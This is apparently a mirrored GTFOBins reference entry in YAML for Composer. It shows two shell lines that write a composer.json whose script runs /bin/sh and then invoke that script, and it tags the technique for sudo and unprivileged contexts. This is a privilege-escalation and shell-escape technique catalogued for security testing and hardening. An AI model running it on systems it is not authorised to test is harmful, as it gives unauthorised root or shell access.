mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2026-03-07 22:46:19 +01:00
11 lines
171 B
Plaintext
11 lines
171 B
Plaintext
---
|
|
functions:
|
|
shell:
|
|
- code: |-
|
|
echo '{"scripts":{"x":"/bin/sh"}}' >composer.json
|
|
composer run-script x
|
|
contexts:
|
|
sudo:
|
|
unprivileged:
|
|
...
|